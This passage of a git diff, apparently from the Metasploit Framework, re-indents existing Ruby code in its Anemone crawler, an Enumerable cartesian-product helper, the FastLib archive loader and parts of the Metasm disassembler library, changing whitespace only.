doc.search( '//script[@src]' ).map { |a| a['src'] } - end + def run + doc.search( '//script[@src]' ).map { |a| a['src'] } + end end diff --git a/lib/anemone/page.rb b/lib/anemone/page.rb index e409f281e3b03..cc0e8c9d0f6be 100644 --- a/lib/anemone/page.rb +++ b/lib/anemone/page.rb @@ -85,8 +85,8 @@ def self.extractors def run_extractors return [] if !doc self.class.extractors.map do |e| - next if e == Extractors::Dirbuster && !dirbust? - e.new( self ).run rescue next + next if e == Extractors::Dirbuster && !dirbust? + e.new( self ).run rescue next end.flatten. compact.map do |p| abs = to_absolute( URI( p ) ) rescue next @@ -186,7 +186,7 @@ def to_absolute(link) end def dirbust? - @dirbust + @dirbust end # @@ -240,7 +240,7 @@ def self.from_hash(hash) end def dup - Marshal.load( Marshal.dump( self ) ) + Marshal.load( Marshal.dump( self ) ) end end diff --git a/lib/anemone/rex_http.rb b/lib/anemone/rex_http.rb index 778981c909328..9c51ad4c8e193 100644 --- a/lib/anemone/rex_http.rb +++ b/lib/anemone/rex_http.rb @@ -51,7 +51,7 @@ def fetch_pages(url, referer = nil, depth = nil) ) # Store the associated raw HTTP request page.request = response.request - pages << page + pages << page end return pages @@ -162,11 +162,11 @@ def get_response(url, referer = nil) response = nil request = nil begin - conn = connection(url) - request = conn.request_raw(opts) - response = conn.send_recv(request, @opts[:timeout] || 10 ) - rescue ::Errno::EPIPE, ::Timeout::Error - end + conn = connection(url) + request = conn.request_raw(opts) + response = conn.send_recv(request, @opts[:timeout] || 10 ) + rescue ::Errno::EPIPE, ::Timeout::Error + end finish = Time.now() @@ -180,28 +180,28 @@ def get_response(url, referer = nil) end def connection(url) - context = { } - context['Msf'] = @opts[:framework] if @opts[:framework] - context['MsfExploit'] = @opts[:module] if @opts[:module] - - conn = Rex::Proto::Http::Client.new( - url.host, - url.port.to_i, - context, - url.scheme == "https", - 'SSLv23', - @opts[:proxies], + context = { } + context['Msf'] = @opts[:framework] if @opts[:framework] + context['MsfExploit'] = @opts[:module] if @opts[:module] + + conn = Rex::Proto::Http::Client.new( + url.host, + url.port.to_i, + context, + url.scheme == "https", + 'SSLv23', + @opts[:proxies], @opts[:username], @opts[:password] - ) + ) - conn.set_config( - 'vhost' => virtual_host(url), - 'agent' => user_agent, + conn.set_config( + 'vhost' => virtual_host(url), + 'agent' => user_agent, 'domain' => @opts[:domain] - ) + ) - conn + conn end def verbose? diff --git a/lib/enumerable.rb b/lib/enumerable.rb index d005c50fd51df..010afda5c5826 100644 --- a/lib/enumerable.rb +++ b/lib/enumerable.rb @@ -18,98 +18,98 @@ # module Enumerable - class << self - # Provides the cross-product of two or more Enumerables. - # This is the class-level method. The instance method - # calls on this. - # - # Enumerable.cart([1,2], [4], ["apple", "banana"]) - # #=> [[1, 4, "apple"], [1, 4, "banana"], [2, 4, "apple"], [2, 4, "banana"]] - # - # Enumerable.cart([1,2], [3,4]) - # #=> [[1, 3], [1, 4], [2, 3], [2, 4]] + class << self + # Provides the cross-product of two or more Enumerables. + # This is the class-level method. The instance method + # calls on this. + # + # Enumerable.cart([1,2], [4], ["apple", "banana"]) + # #=> [[1, 4, "apple"], [1, 4, "banana"], [2, 4, "apple"], [2, 4, "banana"]] + # + # Enumerable.cart([1,2], [3,4]) + # #=> [[1, 3], [1, 4], [2, 3], [2, 4]] - def cartesian_product(*enums, &block) - result = [[]] - while [] != enums - t, result = result, [] - b, *enums = enums - t.each do |a| - b.each do |n| - result << a + [n] - end - end - end - if block_given? - result.each{ |e| block.call(e) } - else - result - end - end + def cartesian_product(*enums, &block) + result = [[]] + while [] != enums + t, result = result, [] + b, *enums = enums + t.each do |a| + b.each do |n| + result << a + [n] + end + end + end + if block_given? + result.each{ |e| block.call(e) } + else + result + end + end - alias_method :cart, :cartesian_product - end + alias_method :cart, :cartesian_product + end - # The instance level version of Enumerable::cartesian_product. - # - # a = [] - # [1,2].cart([4,5]){|elem| a << elem } - # a #=> [[1, 4],[1, 5],[2, 4],[2, 5]] + # The instance level version of Enumerable::cartesian_product. + # + # a = [] + # [1,2].cart([4,5]){|elem| a << elem } + # a #=> [[1, 4],[1, 5],[2, 4],[2, 5]] - def cartesian_product(*enums, &block) - Enumerable.cartesian_product(self, *enums, &block) - end + def cartesian_product(*enums, &block) + Enumerable.cartesian_product(self, *enums, &block) + end - alias :cart :cartesian_product + alias :cart :cartesian_product - # Operator alias for cross-product. - # - # a = [1,2] ** [4,5] - # a #=> [[1, 4],[1, 5],[2, 4],[2, 5]] - # - def **(enum) - Enumerable.cartesian_product(self, enum) - end + # Operator alias for cross-product. + # + # a = [1,2] ** [4,5] + # a #=> [[1, 4],[1, 5],[2, 4],[2, 5]] + # + def **(enum) + Enumerable.cartesian_product(self, enum) + end - # Expected to be an enumeration of arrays. This method - # iterates through combinations of each in position. - # - # a = [ [0,1], [2,3] ] - # a.each_combo { |c| p c } - # - # produces - # - # [0, 2] - # [0, 3] - # [1, 2] - # [1, 3] - # - def each_combo - a = collect{ |x| - x.respond_to?(:to_a) ? x.to_a : 0..x - } + # Expected to be an enumeration of arrays. This method + # iterates through combinations of each in position. + # + # a = [ [0,1], [2,3] ] + # a.each_combo { |c| p c } + # + # produces + # + # [0, 2] + # [0, 3] + # [1, 2] + # [1, 3] + # + def each_combo + a = collect{ |x| + x.respond_to?(:to_a) ? x.to_a : 0..x + } - if a.size == 1 - r = a.shift - r.each{ |n| - yield n - } - else - r = a.shift - r.each{ |n| - a.each_combo{ |s| - yield [n, *s] - } - } - end - end + if a.size == 1 + r = a.shift + r.each{ |n| + yield n + } + else + r = a.shift + r.each{ |n| + a.each_combo{ |s| + yield [n, *s] + } + } + end + end - # As with each_combo but returns combos collected in an array. - # - def combos - a = [] - each_combo{ |c| a << c } - a - end + # As with each_combo but returns combos collected in an array. + # + def combos + a = [] + each_combo{ |c| a << c } + a + end end diff --git a/lib/fastlib.rb b/lib/fastlib.rb index c3d9d2f8c1e5e..efbff68c296a4 100755 --- a/lib/fastlib.rb +++ b/lib/fastlib.rb @@ -38,248 +38,248 @@ # class FastLib - VERSION = "0.0.8" - - FLAG_COMPRESS = 0x01 - FLAG_ENCRYPT = 0x02 - - @@cache = {} - @@has_zlib = false - - # - # Load zlib support if possible - # - begin - require 'zlib' - @@has_zlib = true - rescue ::LoadError - end - - # - # This method returns the version of the fastlib library - # - def self.version - VERSION - end - - # - # This method loads content from a specific archive file by name. If the - # noprocess argument is set to true, the contents will not be expanded to - # include workarounds for things such as __FILE__. This is useful when - # loading raw binary data where these strings may occur - # - def self.load(lib, name, noprocess=false) - data = "" - load_cache(lib) - - return unless ( @@cache[lib] and @@cache[lib][name] ) - - - ::File.open(lib, "rb") do |fd| - fd.seek( - @@cache[lib][:fastlib_header][0] + - @@cache[lib][:fastlib_header][1] + - @@cache[lib][name][0] - ) - data = fastlib_filter_decode( lib, fd.read(@@cache[lib][name][1] )) - end - - # Return the contents in raw or processed form - noprocess ? data : post_process(lib, name, data) - end - - # - # This method caches the file list and offsets within the archive - # - def self.load_cache(lib) - return if @@cache[lib] - @@cache[lib] = {} - - return if not ::File.exists?(lib) - - ::File.open(lib, 'rb') do |fd| - dict = {} - head = fd.read(4) - return if head != "FAST" - hlen = fd.read(4).unpack("N")[0] - flag = fd.read(4).unpack("N")[0] - - @@cache[lib][:fastlib_header] = [12, hlen, fd.stat.mtime.utc.to_i ] - @@cache[lib][:fastlib_flags] = flag - - nlen, doff, dlen, tims = fd.read(16).unpack("N*") - - while nlen > 0 - name = fastlib_filter_decode( lib, fd.read(nlen) ) - dict[name] = [doff, dlen, tims] - - nlen, doff, dlen, tims = fd.read(16).unpack("N*") - end - - @@cache[lib].merge!(dict) - end - - end - - # - # This method provides compression and encryption capabilities - # for the fastlib archive format. - # - def self.fastlib_filter_decode(lib, buff) - - if (@@cache[lib][:fastlib_flags] & FLAG_ENCRYPT) != 0 - - @@cache[lib][:fastlib_decrypt] ||= ::Proc.new do |data| - stub = "decrypt_%.8x" % ( @@cache[lib][:fastlib_flags] & 0xfffffff0 ) - FastLib.send(stub, data) - end - - buff = @@cache[lib][:fastlib_decrypt].call( buff ) - end - - if (@@cache[lib][:fastlib_flags] & FLAG_COMPRESS) != 0 - if not @@has_zlib - raise ::RuntimeError, "zlib is required to open this archive" - end - - z = Zlib::Inflate.new - buff = z.inflate(buff) - buff << z.finish - z.close - end - - buff - end - - # - # This method provides compression and encryption capabilities - # for the fastlib archive format. - # - def self.fastlib_filter_encode(lib, buff) - - if (@@cache[lib][:fastlib_flags] & FLAG_COMPRESS) != 0 - if not @@has_zlib - raise ::RuntimeError, "zlib is required to open this archive" - end - - z = Zlib::Deflate.new - buff = z.deflate(buff) - buff << z.finish - z.close - end - - if (@@cache[lib][:fastlib_flags] & FLAG_ENCRYPT) != 0 - - @@cache[lib][:fastlib_encrypt] ||= ::Proc.new do |data| - stub = "encrypt_%.8x" % ( @@cache[lib][:fastlib_flags] & 0xfffffff0 ) - FastLib.send(stub, data) - end - - buff = @@cache[lib][:fastlib_encrypt].call( buff ) - end - - buff - end - - - # This method provides a way to create a FASTLIB archive programatically. - # - # @param [String] lib the output path for the archive - # @param [String] flag a string containing the hex values for the - # flags ({FLAG_COMPRESS} and {FLAG_ENCRYPT}). - # @param [String] bdir the path to the base directory which will be - # stripped from all paths included in the archive - # @param [Array] dirs list of directories/files to pack into - # the archive. All dirs should be under bdir so that the paths are - # stripped correctly. - # @return [void] - def self.dump(lib, flag, bdir, *dirs) - head = "" - data = "" - hidx = 0 - didx = 0 - - bdir = bdir.gsub(/\/$/, '') - brex = /^#{Regexp.escape(bdir)}\// - - @@cache[lib] = { - :fastlib_flags => flag.to_i(16) - } - - dirs.each do |dir| - ::Find.find(dir) do |path| - next if not ::File.file?(path) - name = fastlib_filter_encode( lib, path.sub( brex, "" ) ) - - buff = "" - ::File.open(path, "rb") do |fd| - buff = fastlib_filter_encode(lib, fd.read(fd.stat.size)) - end - - - head << [ name.length, didx, buff.length, ::File.stat(path).mtime.utc.to_i ].pack("NNNN") - head << name - hidx = hidx + 16 + name.length - - data << buff - didx = didx + buff.length - end - end - - head << [0,0,0].pack("NNN") - - ::File.open(lib, "wb") do |fd| - fd.write("FAST") - fd.write( [ head.length, flag.to_i(16) ].pack("NN") ) - fd.write( head ) - fd.write( data ) - end - end - - # - # This archive provides a way to list the contents of an archive - # file, returning the names only in sorted order. - # - def self.list(lib) - load_cache(lib) - ( @@cache[lib] || {} ).keys.map{|x| x.to_s }.sort.select{ |x| @@cache[lib][x] } - end - - # - # This method is called on the loaded is required to expand __FILE__ - # and other inline dynamic constants to map to the correct location. - # - def self.post_process(lib, name, data) - data.gsub('__FILE__', "'#{ ::File.expand_path(::File.join(::File.dirname(lib), name)) }'") - end - - # - # This is a stub crypto handler that performs a basic XOR - # operation against a fixed one byte key. The two usable IDs - # are 12345600 and 00000000 - # - def self.encrypt_12345600(data) - encrypt_00000000(data) - end - - def self.decrypt_12345600(data) - encrypt_00000000(data) - end - - def self.encrypt_00000000(data) - data.unpack("C*").map{ |c| c ^ 0x90 }.pack("C*") - end - - def self.decrypt_00000000(data) - encrypt_00000000(data) - end - - # - # Expose the cache to callers - # - def self.cache - @@cache - end + VERSION = "0.0.8" + + FLAG_COMPRESS = 0x01 + FLAG_ENCRYPT = 0x02 + + @@cache = {} + @@has_zlib = false + + # + # Load zlib support if possible + # + begin + require 'zlib' + @@has_zlib = true + rescue ::LoadError + end + + # + # This method returns the version of the fastlib library + # + def self.version + VERSION + end + + # + # This method loads content from a specific archive file by name. If the + # noprocess argument is set to true, the contents will not be expanded to + # include workarounds for things such as __FILE__. This is useful when + # loading raw binary data where these strings may occur + # + def self.load(lib, name, noprocess=false) + data = "" + load_cache(lib) + + return unless ( @@cache[lib] and @@cache[lib][name] ) + + + ::File.open(lib, "rb") do |fd| + fd.seek( + @@cache[lib][:fastlib_header][0] + + @@cache[lib][:fastlib_header][1] + + @@cache[lib][name][0] + ) + data = fastlib_filter_decode( lib, fd.read(@@cache[lib][name][1] )) + end + + # Return the contents in raw or processed form + noprocess ? data : post_process(lib, name, data) + end + + # + # This method caches the file list and offsets within the archive + # + def self.load_cache(lib) + return if @@cache[lib] + @@cache[lib] = {} + + return if not ::File.exists?(lib) + + ::File.open(lib, 'rb') do |fd| + dict = {} + head = fd.read(4) + return if head != "FAST" + hlen = fd.read(4).unpack("N")[0] + flag = fd.read(4).unpack("N")[0] + + @@cache[lib][:fastlib_header] = [12, hlen, fd.stat.mtime.utc.to_i ] + @@cache[lib][:fastlib_flags] = flag + + nlen, doff, dlen, tims = fd.read(16).unpack("N*") + + while nlen > 0 + name = fastlib_filter_decode( lib, fd.read(nlen) ) + dict[name] = [doff, dlen, tims] + + nlen, doff, dlen, tims = fd.read(16).unpack("N*") + end + + @@cache[lib].merge!(dict) + end + + end + + # + # This method provides compression and encryption capabilities + # for the fastlib archive format. + # + def self.fastlib_filter_decode(lib, buff) + + if (@@cache[lib][:fastlib_flags] & FLAG_ENCRYPT) != 0 + + @@cache[lib][:fastlib_decrypt] ||= ::Proc.new do |data| + stub = "decrypt_%.8x" % ( @@cache[lib][:fastlib_flags] & 0xfffffff0 ) + FastLib.send(stub, data) + end + + buff = @@cache[lib][:fastlib_decrypt].call( buff ) + end + + if (@@cache[lib][:fastlib_flags] & FLAG_COMPRESS) != 0 + if not @@has_zlib + raise ::RuntimeError, "zlib is required to open this archive" + end + + z = Zlib::Inflate.new + buff = z.inflate(buff) + buff << z.finish + z.close + end + + buff + end + + # + # This method provides compression and encryption capabilities + # for the fastlib archive format. + # + def self.fastlib_filter_encode(lib, buff) + + if (@@cache[lib][:fastlib_flags] & FLAG_COMPRESS) != 0 + if not @@has_zlib + raise ::RuntimeError, "zlib is required to open this archive" + end + + z = Zlib::Deflate.new + buff = z.deflate(buff) + buff << z.finish + z.close + end + + if (@@cache[lib][:fastlib_flags] & FLAG_ENCRYPT) != 0 + + @@cache[lib][:fastlib_encrypt] ||= ::Proc.new do |data| + stub = "encrypt_%.8x" % ( @@cache[lib][:fastlib_flags] & 0xfffffff0 ) + FastLib.send(stub, data) + end + + buff = @@cache[lib][:fastlib_encrypt].call( buff ) + end + + buff + end + + + # This method provides a way to create a FASTLIB archive programatically. + # + # @param [String] lib the output path for the archive + # @param [String] flag a string containing the hex values for the + # flags ({FLAG_COMPRESS} and {FLAG_ENCRYPT}). + # @param [String] bdir the path to the base directory which will be + # stripped from all paths included in the archive + # @param [Array] dirs list of directories/files to pack into + # the archive. All dirs should be under bdir so that the paths are + # stripped correctly. + # @return [void] + def self.dump(lib, flag, bdir, *dirs) + head = "" + data = "" + hidx = 0 + didx = 0 + + bdir = bdir.gsub(/\/$/, '') + brex = /^#{Regexp.escape(bdir)}\// + + @@cache[lib] = { + :fastlib_flags => flag.to_i(16) + } + + dirs.each do |dir| + ::Find.find(dir) do |path| + next if not ::File.file?(path) + name = fastlib_filter_encode( lib, path.sub( brex, "" ) ) + + buff = "" + ::File.open(path, "rb") do |fd| + buff = fastlib_filter_encode(lib, fd.read(fd.stat.size)) + end + + + head << [ name.length, didx, buff.length, ::File.stat(path).mtime.utc.to_i ].pack("NNNN") + head << name + hidx = hidx + 16 + name.length + + data << buff + didx = didx + buff.length + end + end + + head << [0,0,0].pack("NNN") + + ::File.open(lib, "wb") do |fd| + fd.write("FAST") + fd.write( [ head.length, flag.to_i(16) ].pack("NN") ) + fd.write( head ) + fd.write( data ) + end + end + + # + # This archive provides a way to list the contents of an archive + # file, returning the names only in sorted order. + # + def self.list(lib) + load_cache(lib) + ( @@cache[lib] || {} ).keys.map{|x| x.to_s }.sort.select{ |x| @@cache[lib][x] } + end + + # + # This method is called on the loaded is required to expand __FILE__ + # and other inline dynamic constants to map to the correct location. + # + def self.post_process(lib, name, data) + data.gsub('__FILE__', "'#{ ::File.expand_path(::File.join(::File.dirname(lib), name)) }'") + end + + # + # This is a stub crypto handler that performs a basic XOR + # operation against a fixed one byte key. The two usable IDs + # are 12345600 and 00000000 + # + def self.encrypt_12345600(data) + encrypt_00000000(data) + end + + def self.decrypt_12345600(data) + encrypt_00000000(data) + end + + def self.encrypt_00000000(data) + data.unpack("C*").map{ |c| c ^ 0x90 }.pack("C*") + end + + def self.decrypt_00000000(data) + encrypt_00000000(data) + end + + # + # Expose the cache to callers + # + def self.cache + @@cache + end end @@ -288,44 +288,44 @@ def self.cache # FASTLIB archives # if __FILE__ == $0 - cmd = ARGV.shift - unless ["store", "list", "version"].include?(cmd) - $stderr.puts "Usage: #{$0} [dump|list|version] " - exit(0) - end - - case cmd - when "store" - dst = ARGV.shift - flg = ARGV.shift - dir = ARGV.shift - src = ARGV - unless dst and dir and src.length > 0 - $stderr.puts "Usage: #{$0} store destination.fastlib flags base_dir src1 src2 ... src99" - exit(0) - end - FastLib.dump(dst, flg, dir, *src) - - when "list" - src = ARGV.shift - unless src - $stderr.puts "Usage: #{$0} list" - exit(0) - end - $stdout.puts "Library: #{src}" - $stdout.puts "=====================================================" - FastLib.list(src).each do |name| - fsize = FastLib.cache[src][name][1] - ftime = ::Time.at(FastLib.cache[src][name][2]).strftime("%Y-%m-%d %H:%M:%S") - $stdout.puts sprintf("%9d\t%20s\t%s\n", fsize, ftime, name) - end - $stdout.puts "" - - when "version" - $stdout.puts "FastLib Version #{FastLib.version}" - end - - exit(0) + cmd = ARGV.shift + unless ["store", "list", "version"].include?(cmd) + $stderr.puts "Usage: #{$0} [dump|list|version] " + exit(0) + end + + case cmd + when "store" + dst = ARGV.shift + flg = ARGV.shift + dir = ARGV.shift + src = ARGV + unless dst and dir and src.length > 0 + $stderr.puts "Usage: #{$0} store destination.fastlib flags base_dir src1 src2 ... src99" + exit(0) + end + FastLib.dump(dst, flg, dir, *src) + + when "list" + src = ARGV.shift + unless src + $stderr.puts "Usage: #{$0} list" + exit(0) + end + $stdout.puts "Library: #{src}" + $stdout.puts "=====================================================" + FastLib.list(src).each do |name| + fsize = FastLib.cache[src][name][1] + ftime = ::Time.at(FastLib.cache[src][name][2]).strftime("%Y-%m-%d %H:%M:%S") + $stdout.puts sprintf("%9d\t%20s\t%s\n", fsize, ftime, name) + end + $stdout.puts "" + + when "version" + $stdout.puts "FastLib Version #{FastLib.version}" + end + + exit(0) end # @@ -333,95 +333,95 @@ def self.cache # =begin - * All integers are 32-bit and in network byte order (big endian / BE) - * The file signature is 0x46415354 (big endian, use htonl() if necessary) - * The header is always 12 bytes into the archive (magic + header length) - * The data section is always 12 + header length into the archive - * The header entries always start with 'fastlib_header' - * The header entries always consist of 16 bytes + name length (no alignment) - * The header name data may be encoded, compressed, or transformed - * The data entries may be encoded, compressed, or transformed too - - - 4 bytes: "FAST" - 4 bytes: NBO header length - 4 bytes: NBO flags (24-bit crypto ID, 8 bit modes) - [ - 4 bytes: name length (0 = End of Names) - 4 bytes: data offset - 4 bytes: data length - 4 bytes: timestamp - ] - [ Raw Data ] + * All integers are 32-bit and in network byte order (big endian / BE) + * The file signature is 0x46415354 (big endian, use htonl() if necessary) + * The header is always 12 bytes into the archive (magic + header length) + * The data section is always 12 + header length into the archive + * The header entries always start with 'fastlib_header' + * The header entries always consist of 16 bytes + name length (no alignment) + * The header name data may be encoded, compressed, or transformed + * The data entries may be encoded, compressed, or transformed too + + + 4 bytes: "FAST" + 4 bytes: NBO header length + 4 bytes: NBO flags (24-bit crypto ID, 8 bit modes) + [ + 4 bytes: name length (0 = End of Names) + 4 bytes: data offset + 4 bytes: data length + 4 bytes: timestamp + ] + [ Raw Data ] =end module Kernel #:nodoc:all - alias :fastlib_original_require :require - - # - # Store the CWD when were initially loaded - # required for resolving relative paths - # - @@fastlib_base_cwd = ::Dir.pwd - - # - # This method hooks the original Kernel.require to support - # loading files within FASTLIB archives - # - def require(name) - fastlib_require(name) || fastlib_original_require(name) - end - - # - # This method handles the loading of FASTLIB archives - # - def fastlib_require(name) - name = name + ".rb" if not name =~ /\.rb$/ - return false if fastlib_already_loaded?(name) - return false if fastlib_already_tried?(name) - - # XXX Implement relative search paths within archives - $:.map{ |path| - (path =~ /^([A-Za-z]\:|\/)/ ) ? path : ::File.expand_path( ::File.join(@@fastlib_base_cwd, path) ) - }.map{ |path| ::Dir["#{path}/*.fastlib"] }.flatten.uniq.each do |lib| - data = FastLib.load(lib, name) - next if not data - $" << name - - Object.class_eval(data, lib + "::" + name) - - return true - end - - $fastlib_miss << name - - false - end - - # - # This method determines whether the specific file name - # has already been loaded ($LOADED_FEATURES aka $") - # - def fastlib_already_loaded?(name) - re = Regexp.new("^" + Regexp.escape(name) + "$") - $".detect { |e| e =~ re } != nil - end - - # - # This method determines whether the specific file name - # has already been attempted with the included FASTLIB - # archives. - # - # TODO: Ensure that this only applies to known FASTLIB - # archives and that newly included archives will - # be searched appropriately. - # - def fastlib_already_tried?(name) - $fastlib_miss ||= [] - $fastlib_miss.include?(name) - end + alias :fastlib_original_require :require + + # + # Store the CWD when were initially loaded + # required for resolving relative paths + # + @@fastlib_base_cwd = ::Dir.pwd + + # + # This method hooks the original Kernel.require to support + # loading files within FASTLIB archives + # + def require(name) + fastlib_require(name) || fastlib_original_require(name) + end + + # + # This method handles the loading of FASTLIB archives + # + def fastlib_require(name) + name = name + ".rb" if not name =~ /\.rb$/ + return false if fastlib_already_loaded?(name) + return false if fastlib_already_tried?(name) + + # XXX Implement relative search paths within archives + $:.map{ |path| + (path =~ /^([A-Za-z]\:|\/)/ ) ? path : ::File.expand_path( ::File.join(@@fastlib_base_cwd, path) ) + }.map{ |path| ::Dir["#{path}/*.fastlib"] }.flatten.uniq.each do |lib| + data = FastLib.load(lib, name) + next if not data + $" << name + + Object.class_eval(data, lib + "::" + name) + + return true + end + + $fastlib_miss << name + + false + end + + # + # This method determines whether the specific file name + # has already been loaded ($LOADED_FEATURES aka $") + # + def fastlib_already_loaded?(name) + re = Regexp.new("^" + Regexp.escape(name) + "$") + $".detect { |e| e =~ re } != nil + end + + # + # This method determines whether the specific file name + # has already been attempted with the included FASTLIB + # archives. + # + # TODO: Ensure that this only applies to known FASTLIB + # archives and that newly included archives will + # be searched appropriately. + # + def fastlib_already_tried?(name) + $fastlib_miss ||= [] + $fastlib_miss.include?(name) + end end diff --git a/lib/metasm/metasm.rb b/lib/metasm/metasm.rb index 8e2d7a5ed818a..122c87b62c2c2 100644 --- a/lib/metasm/metasm.rb +++ b/lib/metasm/metasm.rb @@ -5,76 +5,76 @@ module Metasm - # root directory for metasm files - # used by some scripts, eg to find samples/dasm-plugin directory - Metasmdir = File.dirname(__FILE__) - # add it to the ruby library path - $: << Metasmdir + # root directory for metasm files + # used by some scripts, eg to find samples/dasm-plugin directory + Metasmdir = File.dirname(__FILE__) + # add it to the ruby library path + $: << Metasmdir - # constants defined in the same file as another - Const_autorequire_equiv = { - 'X86' => 'Ia32', 'PPC' => 'PowerPC', - 'X64' => 'X86_64', 'AMD64' => 'X86_64', - 'UniversalBinary' => 'MachO', 'COFFArchive' => 'COFF', - 'DEY' => 'DEX', - 'PTrace' => 'LinOS', 'FatELF' => 'ELF', - 'LoadedELF' => 'ELF', 'LoadedPE' => 'PE', - 'LoadedAutoExe' => 'AutoExe', - 'LinuxRemoteString' => 'LinOS', - 'LinDebugger' => 'LinOS', - 'WinAPI' => 'WinOS', - 'WindowsRemoteString' => 'WinOS', 'WinDbgAPI' => 'WinOS', - 'WinDebugger' => 'WinOS', - 'GdbRemoteString' => 'GdbClient', 'GdbRemoteDebugger' => 'GdbClient', - 'DecodedInstruction' => 'Disassembler', 'DecodedFunction' => 'Disassembler', - 'InstructionBlock' => 'Disassembler', - } + # constants defined in the same file as another + Const_autorequire_equiv = { + 'X86' => 'Ia32', 'PPC' => 'PowerPC', + 'X64' => 'X86_64', 'AMD64' => 'X86_64', + 'UniversalBinary' => 'MachO', 'COFFArchive' => 'COFF', + 'DEY' => 'DEX', + 'PTrace' => 'LinOS', 'FatELF' => 'ELF', + 'LoadedELF' => 'ELF', 'LoadedPE' => 'PE', + 'LoadedAutoExe' => 'AutoExe', + 'LinuxRemoteString' => 'LinOS', + 'LinDebugger' => 'LinOS', + 'WinAPI' => 'WinOS', + 'WindowsRemoteString' => 'WinOS', 'WinDbgAPI' => 'WinOS', + 'WinDebugger' => 'WinOS', + 'GdbRemoteString' => 'GdbClient', 'GdbRemoteDebugger' => 'GdbClient', + 'DecodedInstruction' => 'Disassembler', 'DecodedFunction' => 'Disassembler', + 'InstructionBlock' => 'Disassembler', + } - # files to require to get the definition of those constants - Const_autorequire = { - 'Ia32' => 'ia32', 'MIPS' => 'mips', 'PowerPC' => 'ppc', 'ARM' => 'arm', - 'X86_64' => 'x86_64', 'Sh4' => 'sh4', 'Dalvik' => 'dalvik', - 'C' => 'compile_c', - 'MZ' => 'exe_format/mz', 'PE' => 'exe_format/pe', - 'ELF' => 'exe_format/elf', 'COFF' => 'exe_format/coff', - 'Shellcode' => 'exe_format/shellcode', 'AutoExe' => 'exe_format/autoexe', - 'AOut' => 'exe_format/a_out', 'MachO' => 'exe_format/macho', - 'DEX' => 'exe_format/dex', - 'NDS' => 'exe_format/nds', 'XCoff' => 'exe_format/xcoff', - 'Bflt' => 'exe_format/bflt', 'Dol' => 'exe_format/dol', - 'Gui' => 'gui', - 'WindowsExports' => 'os/windows_exports', - 'GNUExports' => 'os/gnu_exports', - 'LinOS' => 'os/linux', 'WinOS' => 'os/windows', - 'GdbClient' => 'os/remote', - 'Disassembler' => 'disassemble', - 'Decompiler' => 'decompile', - 'DynLdr' => 'dynldr', - } + # files to require to get the definition of those constants + Const_autorequire = { + 'Ia32' => 'ia32', 'MIPS' => 'mips', 'PowerPC' => 'ppc', 'ARM' => 'arm', + 'X86_64' => 'x86_64', 'Sh4' => 'sh4', 'Dalvik' => 'dalvik', + 'C' => 'compile_c', + 'MZ' => 'exe_format/mz', 'PE' => 'exe_format/pe', + 'ELF' => 'exe_format/elf', 'COFF' => 'exe_format/coff', + 'Shellcode' => 'exe_format/shellcode', 'AutoExe' => 'exe_format/autoexe', + 'AOut' => 'exe_format/a_out', 'MachO' => 'exe_format/macho', + 'DEX' => 'exe_format/dex', + 'NDS' => 'exe_format/nds', 'XCoff' => 'exe_format/xcoff', + 'Bflt' => 'exe_format/bflt', 'Dol' => 'exe_format/dol', + 'Gui' => 'gui', + 'WindowsExports' => 'os/windows_exports', + 'GNUExports' => 'os/gnu_exports', + 'LinOS' => 'os/linux', 'WinOS' => 'os/windows', + 'GdbClient' => 'os/remote', + 'Disassembler' => 'disassemble', + 'Decompiler' => 'decompile', + 'DynLdr' => 'dynldr', + } - # use the Module.autoload ruby functionnality to load framework components on demand - Const_autorequire.each { |cst, file| - autoload cst, File.join('metasm', file) - } + # use the Module.autoload ruby functionnality to load framework components on demand + Const_autorequire.each { |cst, file| + autoload cst, File.join('metasm', file) + } - Const_autorequire_equiv.each { |cst, eqv| - file = Const_autorequire[eqv] - autoload cst, File.join('metasm', file) - } + Const_autorequire_equiv.each { |cst, eqv| + file = Const_autorequire[eqv] + autoload cst, File.join('metasm', file) + } end # load Metasm core files %w[main encode decode render exe_format/main os/main].each { |f| - require File.join('metasm', f) + require File.join('metasm', f) } # remove an 1.9 warning, couldn't find a compatible way... if Hash.new.respond_to?(:key) - puts "using ruby1.9 workaround for Hash#index warning" if $DEBUG - class Hash - alias index_premetasm index rescue nil - undef index rescue nil - alias index key - end + puts "using ruby1.9 workaround for Hash#index warning" if $DEBUG + class Hash + alias index_premetasm index rescue nil + undef index rescue nil + alias index key + end end diff --git a/lib/metasm/metasm/arm/debug.rb b/lib/metasm/metasm/arm/debug.rb index 9f9849889cf2d..acfd579a46dda 100644 --- a/lib/metasm/metasm/arm/debug.rb +++ b/lib/metasm/metasm/arm/debug.rb @@ -8,32 +8,32 @@ module Metasm class ARM - def dbg_register_pc - @dbg_register_pc ||= :pc - end - def dbg_register_flags - @dbg_register_flags ||= :flags - end - - def dbg_register_list - @dbg_register_list ||= [:r0, :r1, :r2, :r3, :r4, :r5, :r6, :r7, :r8, :r9, :r10, :r11, :r12, :sp, :lr, :pc] - end - - def dbg_flag_list - @dbg_flag_list ||= [] - end - - def dbg_register_size - @dbg_register_size ||= Hash.new(32) - end - - def dbg_need_stepover(dbg, addr, di) - di and di.opcode.props[:saveip] - end - - def dbg_end_stepout(dbg, addr, di) - di and di.opcode.name == 'foobar' # TODO - end + def dbg_register_pc + @dbg_register_pc ||= :pc + end + def dbg_register_flags + @dbg_register_flags ||= :flags + end + + def dbg_register_list + @dbg_register_list ||= [:r0, :r1, :r2, :r3, :r4, :r5, :r6, :r7, :r8, :r9, :r10, :r11, :r12, :sp, :lr, :pc] + end + + def dbg_flag_list + @dbg_flag_list ||= [] + end + + def dbg_register_size + @dbg_register_size ||= Hash.new(32) + end + + def dbg_need_stepover(dbg, addr, di) + di and di.opcode.props[:saveip] + end + + def dbg_end_stepout(dbg, addr, di) + di and di.opcode.name == 'foobar' # TODO + end end end diff --git a/lib/metasm/metasm/arm/decode.rb b/lib/metasm/metasm/arm/decode.rb index 06260ff49fc87..3dbf7a3053fcd 100644 --- a/lib/metasm/metasm/arm/decode.rb +++ b/lib/metasm/metasm/arm/decode.rb @@ -8,160 +8,160 @@ module Metasm class ARM - # create the bin_mask for a given opcode - def build_opcode_bin_mask(op) - # bit = 0 if can be mutated by an field value, 1 if fixed by opcode - op.bin_mask = 0 - op.fields.each { |k, (m, s)| - op.bin_mask |= m << s - } - op.bin_mask = 0xffffffff ^ op.bin_mask - end - - # create the lookaside hash from the first byte of the opcode - def build_bin_lookaside - lookaside = Array.new(256) { [] } - - opcode_list.each { |op| - build_opcode_bin_mask op - - b = (op.bin >> 20) & 0xff - msk = (op.bin_mask >> 20) & 0xff - b &= msk - - for i in 